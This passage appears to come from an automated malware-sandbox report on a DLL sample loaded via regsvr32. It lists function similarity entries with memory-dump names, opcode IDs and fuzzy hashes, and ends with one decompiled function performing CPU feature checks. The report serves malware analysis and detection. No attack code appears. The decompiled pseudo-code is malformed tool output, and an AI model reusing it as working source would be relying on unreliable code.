                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c54d9c9c91592db296d578c719c3ba6e2ed36079ac5c5fef9daf66805e4ed66
                                                                                                              • Instruction ID: d6f375cdd611fe9646d7e09eb1b1af1e3baa16d5beebf2d2c37cc30dc0bc7adc
                                                                                                              • Opcode Fuzzy Hash: 1c54d9c9c91592db296d578c719c3ba6e2ed36079ac5c5fef9daf66805e4ed66
                                                                                                              • Instruction Fuzzy Hash: 3831A272604B98C6DB628F29D4503AD7BA4E38DB9CF248125EB8C0B761CF36C196CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180016978 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2747f129a7923805dbf916e3789bd83c103e89e9218754317f5761cd0dcb249c
                                                                                                              • Instruction ID: d89a5b9b4993e822a6d69f9a4de31c76e38d13f5de4a93964f54abd5442bf959
                                                                                                              • Opcode Fuzzy Hash: 2747f129a7923805dbf916e3789bd83c103e89e9218754317f5761cd0dcb249c
                                                                                                              • Instruction Fuzzy Hash: 6931A272605B8486EB628F29D4503AD7BA0E79DB8CF64C125EB8C4B761DF36C596CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800189CC Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                                                              • Instruction ID: 291ff4f9e2cabb05488b42f15fe48e5e576e3fb230daf3d9ad1c5c3a04f7054a
                                                                                                              • Opcode Fuzzy Hash: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                                                              • Instruction Fuzzy Hash: 11319372204B8486EB618F29D0503AD7BA0FB8DF88F64811AEB8C4B351DF36C256D704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180016A80 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e072e59df807cff266ccec95f147a1ac57d82057e78de7c37739342774539d90
                                                                                                              • Instruction ID: 2b7298ace192f40fa85b7d03f9c9ba891b6751bc322bb1f1208ce9e67544df42
                                                                                                              • Opcode Fuzzy Hash: e072e59df807cff266ccec95f147a1ac57d82057e78de7c37739342774539d90
                                                                                                              • Instruction Fuzzy Hash: 81318772618B84C5DB668F29E4913AD7BA0F78CB8CF548119DB4C4B761DF36C196CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018B10 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                                                              • Instruction ID: 118d82cc269797a9ce075ffaa9f12053450d77da3cdc144d3f78e4a2269516cf
                                                                                                              • Opcode Fuzzy Hash: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                                                              • Instruction Fuzzy Hash: 1131A4B2219B84C5DB658F29D49039D7BA0F78DB8CF248115EB8C0B755CF36C256D704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180016B8C Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eb197f497d489a2d262cbe89ca089422f842bb9b48e775ef5c59279686d81614
                                                                                                              • Instruction ID: bbaeb67c4af6e06a5c919e8ff957eb26852bad2d5956d3cb543c39509ba6fbed
                                                                                                              • Opcode Fuzzy Hash: eb197f497d489a2d262cbe89ca089422f842bb9b48e775ef5c59279686d81614
                                                                                                              • Instruction Fuzzy Hash: 6C31A472604B88C5DB628F29E4403AD7BA4F39CB8CF648125EB8C4B761CF36C196CB44
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018C54 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                                                              • Instruction ID: 6899eb2e137a8c4bee34c9b91f7684b63220fecc4855013917f5abbf0960c09d
                                                                                                              • Opcode Fuzzy Hash: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                                                              • Instruction Fuzzy Hash: FB31B472205B88C6EBA18F29E0403AD77A0F79CB8CF248125EB4C4B750CF36C656DB44
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180016CE8 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2726ab327665c8d6d95669bb4f8aa0f186fc6c278644ad8eba84ebd82e99fc98
                                                                                                              • Instruction ID: 65a4cdc2c5ea50fb4ee34f5b6cbb652ded80529b470bf5fe604a1ae9e035c7df
                                                                                                              • Opcode Fuzzy Hash: 2726ab327665c8d6d95669bb4f8aa0f186fc6c278644ad8eba84ebd82e99fc98
                                                                                                              • Instruction Fuzzy Hash: 20319A72B05B9485DB628F29E4503AD7BA0F39DB8CF258115EB8D4B761CF36C156CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018D98 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                                                              • Instruction ID: 147b5058934c38e7aa78d78f0b3a704ec9a77eeeff37ad31454389f65311a824
                                                                                                              • Opcode Fuzzy Hash: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                                                              • Instruction Fuzzy Hash: 5231A272604B88C6DBA18F29E0803AD77A0F78CB8CF648129EB4C4B750DF36C696D704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180016DF0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 085054e42fb680c2cee7f9cbdb044d481e08e68245b2aef5394a32e06da7d157
                                                                                                              • Instruction ID: ce63b4f6da9559d18d9288d252fb2e50f756646aad2815b93fde4606f2565401
                                                                                                              • Opcode Fuzzy Hash: 085054e42fb680c2cee7f9cbdb044d481e08e68245b2aef5394a32e06da7d157
                                                                                                              • Instruction Fuzzy Hash: 4031A476614B98C5DBA28F29D4403AD7BE0E38DB8CF248215EB8D4B761CF36C196CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018EC8 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                                                              • Instruction ID: 174302f09a937d38d3b0b1f65f5b8abe25ca992e0e1863510c9ec31c57da10e6
                                                                                                              • Opcode Fuzzy Hash: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                                                              • Instruction Fuzzy Hash: 33317172205B9886DB618F29D0403AD7BA1F79DF88F248129EB8C4B751DF36C296DB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180016EF8 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d028e7ef5ccf0ba9985552c8e6bf4dd47b16f7576e02f6b364e7992ed74cbaa7
                                                                                                              • Instruction ID: cac2664e3984db9c768aefd909767c645c44e7d3839c443b0f92373083fe0d49
                                                                                                              • Opcode Fuzzy Hash: d028e7ef5ccf0ba9985552c8e6bf4dd47b16f7576e02f6b364e7992ed74cbaa7
                                                                                                              • Instruction Fuzzy Hash: 02319573614A84C5DB628F29E4403AD7BA0F39DB8CF158129EB8C4B761DF36C156CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180018FD0 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                                                              • Instruction ID: 644c083b0f242a42578bff8a4423a20a4a11c3da014dd98187306b0fb5cf8bb4
                                                                                                              • Opcode Fuzzy Hash: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                                                              • Instruction Fuzzy Hash: 4D31A272205B88CADB668F69D0503AD7BA0F38DF98F248129EB8D4B751CF36C596C704
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180019338 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 36b5ad57a243378542d0631789a0718d0fc942e828a8ede123facde318b9cad6
                                                                                                              • Instruction ID: 68479c7df2f3eb2310156e59acac7ebcaf2fdd84bda9610e094c7e8e245dc131
                                                                                                              • Opcode Fuzzy Hash: 36b5ad57a243378542d0631789a0718d0fc942e828a8ede123facde318b9cad6
                                                                                                              • Instruction Fuzzy Hash: 1B319172215A98C6DB62CF69E05079D7BA0F39DB8CF648115EB8D0B751CF36C286CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180019440 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b232946bf37aa12d477fd21a4f0e0eff2adbe799df1a72fb1625ed37053ccc0
                                                                                                              • Instruction ID: 939e66cbc34195f5e5fe9f343826ac37c52055b0db4667a2f081ea4775853aed
                                                                                                              • Opcode Fuzzy Hash: 2b232946bf37aa12d477fd21a4f0e0eff2adbe799df1a72fb1625ed37053ccc0
                                                                                                              • Instruction Fuzzy Hash: A2319172615A88C6DB62CF69E0407AD7BA0F39DB8CF248115EB4D4B751CF36C596CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180019548 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f54a980e7cb41129d3eab13618fd4a596d60a72059e2b35ac37a74938aa00af
                                                                                                              • Instruction ID: 012a784c5dacf3ce5efe67161a1e366ef22d3a4e74041e82062d69a913afe1f5
                                                                                                              • Opcode Fuzzy Hash: 1f54a980e7cb41129d3eab13618fd4a596d60a72059e2b35ac37a74938aa00af
                                                                                                              • Instruction Fuzzy Hash: 2831C072205E88C6EB66CF29E0413AD77A1F399B88F248115EB4D4B750DF36C296CB14
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180019650 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1895c422027262ba3051d7221336d00ac2dcaa50cbb928c6167e989278d9afa
                                                                                                              • Instruction ID: d908f2e6769887bc82199d8e38dedcd7a19c3bfcd7feab257f7cbaf66ea8387d
                                                                                                              • Opcode Fuzzy Hash: e1895c422027262ba3051d7221336d00ac2dcaa50cbb928c6167e989278d9afa
                                                                                                              • Instruction Fuzzy Hash: 8F31E372215A88C6EBA6CF29E0403AD77A0F78DB8CF248115EB4C0B751DF36C196CB04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180059100 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 86%
                                                                                                              			E00000001180059100(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x80072728 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80059161;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x80072728; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x80072728 = r8d;
				 *0x8007272c = r8d;
				return 0;
			}







                                                                                                              0x180059100
                                                                                                              0x180059106
                                                                                                              0x18005910b
                                                                                                              0x180059112
                                                                                                              0x180059112
                                                                                                              0x180059119
                                                                                                              0x18005911b
                                                                                                              0x180059123
                                                                                                              0x180059129
                                                                                                              0x18005912d
                                                                                                              0x180059133
                                                                                                              0x180059137
                                                                                                              0x180059141
                                                                                                              0x18005914b
                                                                                                              0x180059156
                                                                                                              0x18005915a
                                                                                                              0x180059161
                                                                                                              0x18005916f

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
